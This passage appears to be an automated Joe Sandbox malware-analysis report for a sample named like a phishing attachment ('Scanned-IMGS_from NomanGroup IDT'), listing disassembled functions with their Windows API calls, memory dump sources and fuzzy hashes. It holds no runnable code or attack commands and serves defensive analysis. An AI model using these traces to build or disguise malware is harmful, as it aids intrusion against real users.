                                                                                • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                                • Instruction Fuzzy Hash: D5014032100148BBDF115E96CC46DEB3F6DEF88759F04801AFE5C66121C73AE961EBA5
                                                                                Function 00483073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,004513C6,00000000,00000000,?,0048301A,004513C6,00000000,00000000,00000000,?,0048328B,00000006,FlsSetValue), ref: 004830A5
                                                                                • GetLastError.KERNEL32(?,0048301A,004513C6,00000000,00000000,00000000,?,0048328B,00000006,FlsSetValue,004F2290,FlsSetValue,00000000,00000364,?,00482E46), ref: 004830B1
                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0048301A,004513C6,00000000,00000000,00000000,?,0048328B,00000006,FlsSetValue,004F2290,FlsSetValue,00000000), ref: 004830BF
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                • String ID:
                                                                                • API String ID: 3177248105-0
                                                                                • Opcode ID: a8f850bc5ebc772b43a96bff6918faf0979db1e1f9189f23af52bcefe77bde42
                                                                                • Instruction ID: 543792cef7bdbe3c9d1f09807dcdf2502aa9d7399a163f086fbc3419a4b118dd
                                                                                • Opcode Fuzzy Hash: a8f850bc5ebc772b43a96bff6918faf0979db1e1f9189f23af52bcefe77bde42
                                                                                • Instruction Fuzzy Hash: 4301D832742222ABC7315EB99C8496B77989F06F62B100A21F905D7245C725D902C7E8
                                                                                Function 004B7464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 004B747F
                                                                                • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 004B7497
                                                                                • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 004B74AC
                                                                                • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 004B74CA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Type$Register$FileLoadModuleNameUser
                                                                                • String ID:
                                                                                • API String ID: 1352324309-0
                                                                                • Opcode ID: 960c66e8970f2333e25090e4e93be5df6cbfaf6f3ae0e3c675dd85d9e1e2c5cf
                                                                                • Instruction ID: dbdca9c7881d55e3aee1d9ebebd17cae65b5ea044d0d66b431f499aa24f286ba
                                                                                • Opcode Fuzzy Hash: 960c66e8970f2333e25090e4e93be5df6cbfaf6f3ae0e3c675dd85d9e1e2c5cf
                                                                                • Instruction Fuzzy Hash: 3011C4B1205314AFE7208F14DD48FE27FFCEB40B01F10896AE656DA192D774E905DBA5
                                                                                Function 004BB0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,004BACD3,?,00008000), ref: 004BB0C4
                                                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,004BACD3,?,00008000), ref: 004BB0E9
                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,004BACD3,?,00008000), ref: 004BB0F3
                                                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,004BACD3,?,00008000), ref: 004BB126
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: CounterPerformanceQuerySleep
                                                                                • String ID:
                                                                                • API String ID: 2875609808-0
                                                                                • Opcode ID: d9958f14e8f1058ec96f5bc4c4041f2ea633ba58ebbcc768e7e679d9fc5cc2f5
                                                                                • Instruction ID: 2fb12fdd3dbdfe98d3ccbfa362a86e14c4e0554b3f9b163ecfcaee952da24e91
                                                                                • Opcode Fuzzy Hash: d9958f14e8f1058ec96f5bc4c4041f2ea633ba58ebbcc768e7e679d9fc5cc2f5
                                                                                • Instruction Fuzzy Hash: D1116131C0151CE7CF10AFE9D9986FEBB78FF0A751F104096D941B6241CBB45551CBA9
                                                                                Function 004B2DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 004B2DC5
                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 004B2DD6
                                                                                • GetCurrentThreadId.KERNEL32 ref: 004B2DDD
                                                                                • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 004B2DE4
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                • String ID:
                                                                                • API String ID: 2710830443-0
                                                                                • Opcode ID: f2fbab0f59a5141b2cfa3d5b38de67a537a3707c284c301160e8c2cf3d05b9ad
                                                                                • Instruction ID: 1e80ceb743985be7716bd6be0c86010ef8f282316ff1a7d2b37f6897455658f1
                                                                                • Opcode Fuzzy Hash: f2fbab0f59a5141b2cfa3d5b38de67a537a3707c284c301160e8c2cf3d05b9ad
                                                                                • Instruction Fuzzy Hash: B8E09272141224BBDB201B729C8DFEB7E6CEF42BA1F00042AF105D50819AE4C842D6B5
                                                                                Function 004E8863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00469639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00469693
                                                                                  • Part of subcall function 00469639: SelectObject.GDI32(?,00000000), ref: 004696A2
                                                                                  • Part of subcall function 00469639: BeginPath.GDI32(?), ref: 004696B9
                                                                                  • Part of subcall function 00469639: SelectObject.GDI32(?,00000000), ref: 004696E2
                                                                                • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 004E8887
                                                                                • LineTo.GDI32(?,?,?), ref: 004E8894
                                                                                • EndPath.GDI32(?), ref: 004E88A4
                                                                                • StrokePath.GDI32(?), ref: 004E88B2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                • String ID:
                                                                                • API String ID: 1539411459-0
                                                                                • Opcode ID: 378ef76bc7d256528b2a207eda0ae94d7c2be78d724bcc70783f1669b281069c
                                                                                • Instruction ID: ee21b07fa9613a2a3193b12e18644cfdf648be6ed4006721b583dba1a462986d
                                                                                • Opcode Fuzzy Hash: 378ef76bc7d256528b2a207eda0ae94d7c2be78d724bcc70783f1669b281069c
                                                                                • Instruction Fuzzy Hash: 80F09A36001298FADF122F94AC49FCA3B19AF16310F008011FE01690E2C7B81552DFAD
                                                                                Function 004698B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetSysColor.USER32(00000008), ref: 004698CC
                                                                                • SetTextColor.GDI32(?,?), ref: 004698D6
                                                                                • SetBkMode.GDI32(?,00000001), ref: 004698E9
                                                                                • GetStockObject.GDI32(00000005), ref: 004698F1
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Color$ModeObjectStockText
                                                                                • String ID:
                                                                                • API String ID: 4037423528-0
                                                                                • Opcode ID: dadbf80e261d5b62f94c8810c0939905c326115c0289329d942f97c0ef55c7b6
                                                                                • Instruction ID: e33603a4d55b663528bf754fae2a312cc06a50e9aab07d1e153b54852d877060
                                                                                • Opcode Fuzzy Hash: dadbf80e261d5b62f94c8810c0939905c326115c0289329d942f97c0ef55c7b6
                                                                                • Instruction Fuzzy Hash: 96E06D31244680BADB215B78EC89BE97F20EB22336F04832AF6FA581E2C37546419F15
                                                                                Function 004B162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCurrentThread.KERNEL32 ref: 004B1634
                                                                                • OpenThreadToken.ADVAPI32(00000000,?,?,?,004B11D9), ref: 004B163B
                                                                                • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,004B11D9), ref: 004B1648
                                                                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,004B11D9), ref: 004B164F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentOpenProcessThreadToken
                                                                                • String ID:
                                                                                • API String ID: 3974789173-0
                                                                                • Opcode ID: f3f132698345402964f257018a71999227e2830ceae5fd839c773d778bd1aaee
                                                                                • Instruction ID: 11e28d4170dd770529579ab63edf3af55017f0cb8c13355b0cbdffcadd610865
                                                                                • Opcode Fuzzy Hash: f3f132698345402964f257018a71999227e2830ceae5fd839c773d778bd1aaee
                                                                                • Instruction Fuzzy Hash: 9DE08631A01211DBD7201FE49D8DB973B7CAF54791F144829F646CD091D7384442C7A8
                                                                                Function 004AD858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetDesktopWindow.USER32 ref: 004AD858
                                                                                • GetDC.USER32(00000000), ref: 004AD862
                                                                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 004AD882
                                                                                • ReleaseDC.USER32(?), ref: 004AD8A3
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                                                • String ID:
                                                                                • API String ID: 2889604237-0
                                                                                • Opcode ID: 1dc4bdeb2b46953f85ab8ca449c5a2b39e41431561fb9d9105ec4fbd956e57b4
                                                                                • Instruction ID: 833643ddd91d2c3440817605cd80a29e743cd0515d4c7a17ecc4439618ae711a
                                                                                • Opcode Fuzzy Hash: 1dc4bdeb2b46953f85ab8ca449c5a2b39e41431561fb9d9105ec4fbd956e57b4
                                                                                • Instruction Fuzzy Hash: A8E01AB5C00204DFCF41AFB5D88866EBBB2FB48311F10842AE816EB251C7384903AF49
                                                                                Function 004AD86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetDesktopWindow.USER32 ref: 004AD86C
                                                                                • GetDC.USER32(00000000), ref: 004AD876
                                                                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 004AD882
                                                                                • ReleaseDC.USER32(?), ref: 004AD8A3
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                                                • String ID:
                                                                                • API String ID: 2889604237-0
                                                                                • Opcode ID: 2134b0a8563bbcb2061a9f8dcc365907cc5cfd288bc8a14c29b2a63eebbc2385
                                                                                • Instruction ID: 70ce21e2603f8b1f4f9a9bbdb90b6bc4c78326b6acba48628e33c80385491ba4
                                                                                • Opcode Fuzzy Hash: 2134b0a8563bbcb2061a9f8dcc365907cc5cfd288bc8a14c29b2a63eebbc2385
                                                                                • Instruction Fuzzy Hash: E1E01A75C00200DFCF409FB4D88866EBBB1BB48311B108419E816EB251C73859039F48
                                                                                Function 004C4D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00457620: _wcslen.LIBCMT ref: 00457625
                                                                                • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 004C4ED4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Connection_wcslen
                                                                                • String ID: *$LPT
                                                                                • API String ID: 1725874428-3443410124
                                                                                • Opcode ID: 051e03c3b32d39ada80adf87d02e58e33f90e3a535485805ccc7ed4ce7acb6f1
                                                                                • Instruction ID: cf3ef47fcc9fc65c8681dbbde936754a16444b6a29ed661bf1a88c54ae03bd09
                                                                                • Opcode Fuzzy Hash: 051e03c3b32d39ada80adf87d02e58e33f90e3a535485805ccc7ed4ce7acb6f1
                                                                                • Instruction Fuzzy Hash: 75918F78A002049FCB54DF54C594FAABBF1AF84308F15809EE84A9F362D739ED85CB55
                                                                                Function 0047E27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __startOneArgErrorHandling.LIBCMT ref: 0047E30D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorHandling__start
                                                                                • String ID: pow
                                                                                • API String ID: 3213639722-2276729525
                                                                                • Opcode ID: 170238ad0246a192f8bf3404401e95c98d8e3681746b85b856b4688777423c9d
                                                                                • Instruction ID: b861eac9d544f15d79f75c96617b55086cbfe051e33ca76e62529099d8edf46f
                                                                                • Opcode Fuzzy Hash: 170238ad0246a192f8bf3404401e95c98d8e3681746b85b856b4688777423c9d
                                                                                • Instruction Fuzzy Hash: 80512861A0C20296CB117715C9513BF3BA4AB54740F34CEEBE499433A9EB3DCC959B4E
                                                                                Function 004D7771 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CharUpperBuffW.USER32(004A569E,00000000,?,004ECC08,?,00000000,00000000), ref: 004D78DD
                                                                                  • Part of subcall function 00456B57: _wcslen.LIBCMT ref: 00456B6A
                                                                                • CharUpperBuffW.USER32(004A569E,00000000,?,004ECC08,00000000,?,00000000,00000000), ref: 004D783B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: BuffCharUpper$_wcslen
                                                                                • String ID: <sQ
                                                                                • API String ID: 3544283678-3394145969
                                                                                • Opcode ID: ac91da1bd2f92965dd9a1590f87ad8438ecfd6f2b79fae512bfd6d5922377923
                                                                                • Instruction ID: 4c4cebb46a192e4c881125613387f7c82477d31ce4087dfe623d253fe085399e
                                                                                • Opcode Fuzzy Hash: ac91da1bd2f92965dd9a1590f87ad8438ecfd6f2b79fae512bfd6d5922377923
                                                                                • Instruction Fuzzy Hash: FB6164729141189ACF04FBA5CCA1DFDB374BF14305B44052BF942A7252FB385A49DBA8
                                                                                Function 0046E187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: #
                                                                                • API String ID: 0-1885708031
                                                                                • Opcode ID: 77b918550989552c06c47d409dc80b631703e48c31b6644da4ef63729e1be370
                                                                                • Instruction ID: f74c97f5cae78128e829dfa863d4f72036b9993a6b8597bf4e1d33d48fae149e
                                                                                • Opcode Fuzzy Hash: 77b918550989552c06c47d409dc80b631703e48c31b6644da4ef63729e1be370
                                                                                • Instruction Fuzzy Hash: 58513279500246DFDB14DF2AC0916BB7BA5EF66310F24405BE8619B280E6389D43CBAA
                                                                                Function 0046F291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • Sleep.KERNEL32(00000000), ref: 0046F2A2
                                                                                • GlobalMemoryStatusEx.KERNEL32(?), ref: 0046F2BB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: GlobalMemorySleepStatus
                                                                                • String ID: @
                                                                                • API String ID: 2783356886-2766056989
                                                                                • Opcode ID: 3ae79e5a7c0d64c27c5c4d36af54f6baaed46d1335aaafb611ec759e627e5e45
                                                                                • Instruction ID: 6139f23c25b47c9200ec9f2bc8a7a00efb73d64b92fed30b1c0a2c6a63bf8401
                                                                                • Opcode Fuzzy Hash: 3ae79e5a7c0d64c27c5c4d36af54f6baaed46d1335aaafb611ec759e627e5e45
                                                                                • Instruction Fuzzy Hash: 995136724087449BD320AF11EC86BAFBBE8FB94305F81885DF5D941196EB34852DCB6B
                                                                                Function 004D5745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 004D57E0
                                                                                • _wcslen.LIBCMT ref: 004D57EC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: BuffCharUpper_wcslen
                                                                                • String ID: CALLARGARRAY
                                                                                • API String ID: 157775604-1150593374
                                                                                • Opcode ID: 7a001a96a9618938f81b4c2cc1ccece17343cb01d405c0f85bc24dd18bcf417c
                                                                                • Instruction ID: a84d8209a97edb506577d44b1a122c5a74cbc9280d1ac266c95df22a937a2f74
                                                                                • Opcode Fuzzy Hash: 7a001a96a9618938f81b4c2cc1ccece17343cb01d405c0f85bc24dd18bcf417c
                                                                                • Instruction Fuzzy Hash: 2F418271A002059FCB14EFAAC8918BEBBB5EF59355F10406FF505A7352EB389D41CB94
                                                                                Function 004CD0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _wcslen.LIBCMT ref: 004CD130
                                                                                • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 004CD13A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
